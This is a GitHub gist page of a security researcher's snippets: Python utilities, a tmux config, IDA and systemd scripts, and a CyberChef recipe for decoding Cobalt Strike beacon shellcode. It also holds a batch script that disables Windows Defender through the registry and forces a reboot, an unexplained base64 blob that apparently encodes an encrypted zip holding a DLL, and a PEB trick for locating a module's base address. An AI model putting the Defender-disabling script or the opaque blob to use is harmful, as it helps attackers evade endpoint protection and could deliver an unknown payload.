Skip to content

Instantly share code, notes, and snippets.

View plowsec's full-sized avatar

volodya plowsec

96 followers · 50 following
View GitHub Profile
@plowsec
plowsec / py_cheatsheet.py
Last active February 2, 2023 14:57
Useful python snippets
# dataclass with dict
from dataclasses import dataclass, field
@dataclass
class Stuff:
a: int
b: str
MyDict: dict = field(default_factory=dict) # otherwise the dict is shared between all instances
@plowsec
plowsec / 0_CyberChef_CobaltStrike_Shellcode_Decoder_Recipe
Created February 25, 2021 09:38 — forked from 0xtornado/0_CyberChef_CobaltStrike_Shellcode_Decoder_Recipe
CyberChef recipe to extract and decode Shellcode from a Cobalt Strike beacon
[{"op":"Conditional Jump","args":["bxor",false,"Decode_Shellcode",10]},{"op":"Label","args":["Decode_beacon"]},{"op":"From Base64","args":["A-Za-z0-9+/=",true]},{"op":"Decode text","args":["UTF-16LE (1200)"]},{"op":"Regular expression","args":["User defined","[a-zA-Z0-9+/=]{30,}",true,true,false,false,false,false,"List matches"]},{"op":"From Base64","args":["A-Za-z0-9+/=",true]},{"op":"Gunzip","args":[]},{"op":"Label","args":["Decode_Shellcode"]},{"op":"Regular expression","args":["User defined","[a-zA-Z0-9+/=]{30,}",true,true,false,false,false,false,"List matches"]},{"op":"Conditional Jump","args":["",false,"",10]},{"op":"From Base64","args":["A-Za-z0-9+/=",true]},{"op":"XOR","args":[{"option":"Decimal","string":"35"},"Standard",false]}]
@plowsec
plowsec / disable-wd.bat
Created July 7, 2021 16:17
@ECHO OFF
NET SESSION >nul 2>&1
if %errorLevel% == 0 (
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /V DisableAntiSpyware /T REG_DWORD /D 1 /F
ECHO [+] Restart required in order to apply modification.
SET /P temp="[?] Press a key to reboot"
SHUTDOWN /R /F /T 0
) else (
@plowsec
plowsec / toto
Created October 9, 2021 16:07
UEsDBBQACQAIAFKJMVOwiYbLqycEAABOBAAIABwAc2Vucy5kbGxVVAkAA+uvRGFPuGFhdXgLAAEE9QEAAAQUAAAAQNm5ETRIyZwTaUfocRePj+wzhsQJRc0YB+VlJ9JCvC5EMkeMWADNWUdRmtibDFVCKJTWYjEF+babobN+l+d0t3MQfmEcfCNgLWBkdhKmLFDKQCGB3XoIMbdWhQTCwG/NY3XX23AsMVZqPDvRVVSYWUI0HheuTIif6mSFGUcgJFpYUVCOsnHCktkAbhUfcwrVBe0WnMw2+VNN5HsAv7cKSDQq+vVzUM0ugScfAj6vzhtL0qrts+M7KFqwH/zP/99xaOqJLgWwAHaezwIaKIX3ZDUdEG3j//RPtbIgsQSP3TscloOWj+kdTHbnuVxLB5bvPuYdi8e2lPPQSGXmaaUpM4Ae1oTPDSy1V24huUh5SWdUuidteR2MUlYcjUQ9rBS1/0IlHM05Ap6pjbB06QGdDDRuvFVKisZIfQSFTeUZY9PM6+9zFoGRtWI8+JzQJE5gEM0Z67xMDkF/irNcN9kkrc8q9w4inQ1/dunw7NacpNmgyy0/JTP2fw9idrkKyTBNrYhiJZwRVVMnxe6miqpfp2+SyzPw/k+awThAekGbZFnCWSUd9TI23tlbRINaysQDH+/apdXeWhoATp7GWEVdl/3Cd3FsMbsGN60OSZt+ZY30HA9KVPpaKI5eBjfEP9cYB+elYE09XwbwphDWcHTPSnCjU+H2qDb2KsA1K1aLK2568tbPx+PKal6eVL5q7RbvtDj94vXBCmouMHB8UhXzMNpg61KwZKog928JJO0mpAq1j8QcKlj9CCH2BWbbf0sTjrgC5BUXwMu6ZLtMnzCZFx2S/+HB7LTq43NJqKJaAINgkBv7/2YvGpSXZiSUh/wlmj9sb9nf3KEcRhX98z2mqajZXOC5SH1O6c5iyIloHXdySG6OrPaO/75WQdq9ORJdtrOBqImZRSEdIZ5KNgzorjjicay7/j0ZQ6snLeO7
@plowsec
plowsec / getmodulehandle.md
Created January 27, 2022 14:18
Get own module base address without GetModuleHandle

Get own module base address without GetModuleHandle

_PEB* peb = (_PEB*)__readgsqword(0x60); // 0x30 for x86
LPVOID ImageBase2 = (LPVOID)peb->lpImageBaseAddress;
LPVOID ImageBase = (LPVOID)GetModuleHandleA(NULL);
std::cout << "Image base 1 vs 2 : " << std::hex << ImageBase << " " << ImageBase2 << std::endl;
@plowsec
plowsec / .tmux.conf
Created March 13, 2022 12:01
.tmux.conf
set -g mouse on
set-option -sg escape-time 10
set -g mouse-select-pane on
set -g mouse-select-window on
set -g history-limit 100000000
set-option -g repeat-time 50
set -g default-terminal "screen-256color"
set -sg escape-time 0
set -g display-panes-time 5000
@plowsec
plowsec / systemd_dependencies_printer.py
Created June 30, 2022 14:07
Quick and dirty script to display systemd services as a directed graph
import networkx as nx
import sys
import os
import logging
import configparser
import traceback
from typing import List
from collections import OrderedDict
logging.basicConfig(level=logging.DEBUG)
@plowsec
plowsec / ida_get_all_functions.idc
Created July 21, 2022 12:40
Get all the functions addresses and names from an IDB
auto func,i;
func = NextFunction(0);
while ( func != BADADDR )
{
Message("start = 0x%08x name = %s\n" , func , GetFunctionName(func));
func = NextFunction(func);
}
@plowsec
plowsec / logutils.py
Created December 16, 2022 09:49
logging with colors and tqdm progress bar + pickle + ctrl-c handler
import json
import sys
import os
import logging
import argparse
import time
import requests
import re
from urllib.parse import urlparse
@plowsec
plowsec / upload.py
Last active February 1, 2023 15:46
Simple Python3 HTTP server to upload files + HTML upload page
import os
import http.server, http, cgi
import re
from io import BytesIO
import logging
import pathlib
import tempfile
fmt = '%(asctime)s | %(levelname)8s | [%(filename)s:%(lineno)3d] %(funcName)s() | %(message)s'
logger = logging.getLogger(__name__)